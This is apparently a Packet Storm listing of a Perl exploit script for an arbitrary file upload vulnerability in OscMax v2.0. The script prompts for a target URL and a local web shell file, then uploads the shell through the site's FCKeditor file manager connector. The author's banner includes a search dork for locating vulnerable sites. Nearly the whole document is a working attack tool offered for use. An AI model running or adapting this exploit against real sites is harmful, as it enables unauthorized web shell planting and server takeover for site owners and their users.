OscMax version 2.0 arbitrary file upload exploit.
34d0d136336451a4413ec7d3ff47b962efc63ce0c5304e4f29b92203f8c2d063#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<START;
in the wild...
########################################################
#OscMax v2.0 Arbitrary File Upload Vulnerability #
# #
#By: e.wiZz! #
#Site: infected.blogger.ba #
#Info: Bosnian Idiot FTW! #
#Greetz: suN8Hclf,str0ke,najjaci.net #
#Dork: "powered by oscmax v2.0" 69 800 :) # #
########################################################
########################################################
START
print "Enter URL(http://inthewild.xxx): ";
chomp(my $url=<STDIN>);
print "Localpath of shell(C:/whatever): ";
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'FCKeditor/editor/filemanager/browser/default/connectors/test.html',
Content_Type => 'form-data',
Content => [ NewFile => $file ] );
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
else { print "Failed!\n"; }
} else { print "No site tho!\n"; }
exit;
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed